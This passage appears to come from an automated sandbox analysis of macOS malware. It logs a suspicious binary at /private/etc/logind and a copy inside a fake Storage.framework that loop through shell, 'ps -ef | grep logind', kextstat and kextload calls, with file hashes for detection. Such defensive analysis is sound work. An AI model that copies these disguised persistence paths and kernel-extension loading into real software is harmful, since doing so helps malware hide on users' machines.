Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 801 Parent PID: 1

General

Start time:	15:32:04
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 802 Parent PID: 801

General

Start time:	15:32:04
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 803 Parent PID: 802

General

Start time:	15:32:04
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 803 Parent PID: 802

General

Start time:	15:32:04
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 804 Parent PID: 802

General

Start time:	15:32:04
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 804 Parent PID: 802

General

Start time:	15:32:04
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 819 Parent PID: 801

General

Start time:	15:32:09
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 822 Parent PID: 801

General

Start time:	15:32:19
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 823 Parent PID: 801

General

Start time:	15:32:19
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 827 Parent PID: 1

General

Start time:	15:32:34
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 827 Parent PID: 1

General

Start time:	15:32:34
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 828 Parent PID: 827

General

Start time:	15:32:34
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 829 Parent PID: 828

General

Start time:	15:32:34
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 829 Parent PID: 828

General

Start time:	15:32:34
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 830 Parent PID: 828

General

Start time:	15:32:34
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 830 Parent PID: 828

General

Start time:	15:32:34
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 831 Parent PID: 827

General

Start time:	15:32:40
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 833 Parent PID: 827

General

Start time:	15:32:50
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 834 Parent PID: 827

General

Start time:	15:32:50
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 835 Parent PID: 1

General

Start time:	15:32:50
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 835 Parent PID: 1

General

Start time:	15:32:50
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 836 Parent PID: 835

General

Start time:	15:32:50
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 837 Parent PID: 836

General

Start time:	15:32:50
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 837 Parent PID: 836

General

Start time:	15:32:50
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 838 Parent PID: 836

General

Start time:	15:32:50
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 838 Parent PID: 836

General

Start time:	15:32:50
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 839 Parent PID: 835

General

Start time:	15:32:56
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 840 Parent PID: 835

General

Start time:	15:33:06
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 841 Parent PID: 835

General

Start time:	15:33:06
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 842 Parent PID: 1

General

Start time:	15:33:06
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 842 Parent PID: 1

General

Start time:	15:33:06
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 843 Parent PID: 842

General

Start time:	15:33:06
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 844 Parent PID: 843

General

Start time:	15:33:06
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 844 Parent PID: 843

General

Start time:	15:33:06
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 845 Parent PID: 843

General

Start time:	15:33:06
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 845 Parent PID: 843

General

Start time:	15:33:06
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 846 Parent PID: 842

General

Start time:	15:33:11
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 847 Parent PID: 842

General

Start time:	15:33:21
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 848 Parent PID: 842

General

Start time:	15:33:22
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 849 Parent PID: 1

General

Start time:	15:33:22
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 849 Parent PID: 1

General

Start time:	15:33:22
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 850 Parent PID: 849

General

Start time:	15:33:22
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 851 Parent PID: 850

General

Start time:	15:33:22
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 851 Parent PID: 850

General

Start time:	15:33:22
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 852 Parent PID: 850

General

Start time:	15:33:22
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 852 Parent PID: 850

General

Start time:	15:33:22
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 853 Parent PID: 849

General

Start time:	15:33:27
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 854 Parent PID: 849

General

Start time:	15:33:37
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 855 Parent PID: 849

General

Start time:	15:33:38
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 856 Parent PID: 1

General

Start time:	15:33:38
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 856 Parent PID: 1

General

Start time:	15:33:38
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 857 Parent PID: 856

General

Start time:	15:33:38
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 858 Parent PID: 857

General

Start time:	15:33:38
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 858 Parent PID: 857

General

Start time:	15:33:38
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 859 Parent PID: 857

General

Start time:	15:33:38
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 859 Parent PID: 857

General

Start time:	15:33:38
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 860 Parent PID: 856

General

Start time:	15:33:43
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 861 Parent PID: 856

General

Start time:	15:33:53
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 862 Parent PID: 856

General

Start time:	15:33:53
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 863 Parent PID: 1

General

Start time:	15:33:54
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 863 Parent PID: 1

General

Start time:	15:33:54
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 864 Parent PID: 863

General

Start time:	15:33:54
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 865 Parent PID: 864

General

Start time:	15:33:54
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 865 Parent PID: 864

General

Start time:	15:33:54
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 866 Parent PID: 864

General

Start time:	15:33:54
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 866 Parent PID: 864

General

Start time:	15:33:54
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 867 Parent PID: 863

General

Start time:	15:33:59
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 868 Parent PID: 863

General

Start time:	15:34:09
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 869 Parent PID: 863

General

Start time:	15:34:09
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 870 Parent PID: 1

General

Start time:	15:34:09
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 870 Parent PID: 1

General

Start time:	15:34:09
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 871 Parent PID: 870

General

Start time:	15:34:09
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 872 Parent PID: 871

General

Start time:	15:34:09
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 872 Parent PID: 871

General

Start time:	15:34:09
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 873 Parent PID: 871

General

Start time:	15:34:09
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 873 Parent PID: 871

General

Start time:	15:34:09
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 875 Parent PID: 870

General

Start time:	15:34:15
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 876 Parent PID: 870

General

Start time:	15:34:25
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 877 Parent PID: 870

General

Start time:	15:34:25
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 878 Parent PID: 1

General

Start time:	15:34:25
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 878 Parent PID: 1

General

Start time:	15:34:25
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 879 Parent PID: 878

General

Start time:	15:34:25
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 880 Parent PID: 879

General

Start time:	15:34:25
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 880 Parent PID: 879

General

Start time:	15:34:25
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 881 Parent PID: 879

General

Start time:	15:34:25
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 881 Parent PID: 879

General

Start time:	15:34:25
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 882 Parent PID: 878

General

Start time:	15:34:31
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 883 Parent PID: 878

General

Start time:	15:34:41
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 884 Parent PID: 878

General

Start time:	15:34:41
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 885 Parent PID: 1

General

Start time:	15:34:41
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 885 Parent PID: 1

General

Start time:	15:34:41
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 886 Parent PID: 885

General

Start time:	15:34:41
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 887 Parent PID: 886

General

Start time:	15:34:41
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 887 Parent PID: 886

General

Start time:	15:34:41
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 888 Parent PID: 886

General

Start time:	15:34:41
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 888 Parent PID: 886

General

Start time:	15:34:41
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 889 Parent PID: 885

General

Start time:	15:34:46
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 890 Parent PID: 885

General

Start time:	15:34:56
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 891 Parent PID: 885

General

Start time:	15:34:57
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 892 Parent PID: 1

General

Start time:	15:34:57
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 892 Parent PID: 1

General

Start time:	15:34:57
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 893 Parent PID: 892

General

Start time:	15:34:57
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 894 Parent PID: 893

General

Start time:	15:34:57
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 894 Parent PID: 893

General

Start time:	15:34:57
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 895 Parent PID: 893

General

Start time:	15:34:57
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 895 Parent PID: 893

General

Start time:	15:34:57
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 896 Parent PID: 892

General

Start time:	15:35:02
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 897 Parent PID: 892

General

Start time:	15:35:12
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 898 Parent PID: 892

General

Start time:	15:35:12
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 899 Parent PID: 1

General

Start time:	15:35:13
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
MD5 hash:	4782e7ebd2985d32bc84f1f71c8f8fb7

Chronological Activities

Analysis Process: logind PID: 899 Parent PID: 1

General

Start time:	15:35:13
Start date:	28/09/2020
Path:	/private/etc/logind
Arguments:	/private/etc/logind
File size:	34432 bytes
MD5 hash:	6bfeb5419fb74f46fbbdba90f1b817fd

Chronological Activities

Analysis Process: sh PID: 900 Parent PID: 899

General

Start time:	15:35:13
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: sh PID: 901 Parent PID: 900

General

Start time:	15:35:13
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: ps PID: 901 Parent PID: 900

General

Start time:	15:35:13
Start date:	28/09/2020
Path:	/bin/ps
Arguments:	ps -ef
File size:	51280 bytes
MD5 hash:	12e96c3ace6dcbbe7e84712ef5fb23cd

Chronological Activities

Analysis Process: sh PID: 902 Parent PID: 900

General

Start time:	15:35:13
Start date:	28/09/2020
Path:	/bin/sh
Arguments:	n/a
File size:	618480 bytes
MD5 hash:	348affb69862798fd7b2f8874437f649

Chronological Activities

Analysis Process: grep PID: 902 Parent PID: 900

General

Start time:	15:35:13
Start date:	28/09/2020
Path:	/usr/bin/grep
Arguments:	grep logind
File size:	33952 bytes
MD5 hash:	e1a87983928499c3350fe1775def5d49

Chronological Activities

Analysis Process: logind PID: 903 Parent PID: 899

General

Start time:	15:35:18
Start date:	28/09/2020
Path:	/Library/Frameworks/Storage.framework/Contents/MacOS/logind
Arguments:	n/a
File size:	536860 bytes
MD5 hash:	262c9241b5f50293cb972c0e93d5d5fc

Chronological Activities

Analysis Process: kextstat PID: 904 Parent PID: 899

General

Start time:	15:35:28
Start date:	28/09/2020
Path:	/usr/sbin/kextstat
Arguments:	n/a
File size:	58496 bytes
MD5 hash:	7c164dee278802ab4b623c595b32cec3

Chronological Activities

Analysis Process: kextload PID: 905 Parent PID: 899

General

Start time:	15:35:28
Start date:	28/09/2020
Path:	/sbin/kextload
Arguments:	n/a
File size:	132592 bytes
MD5 hash:	14e47a1e85e93a7d3ef36621f9592d77

Chronological Activities

Analysis Process: xpcproxy PID: 906 Parent PID: 1

General

Start time:	15:35:28
Start date:	28/09/2020
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	44048 bytes
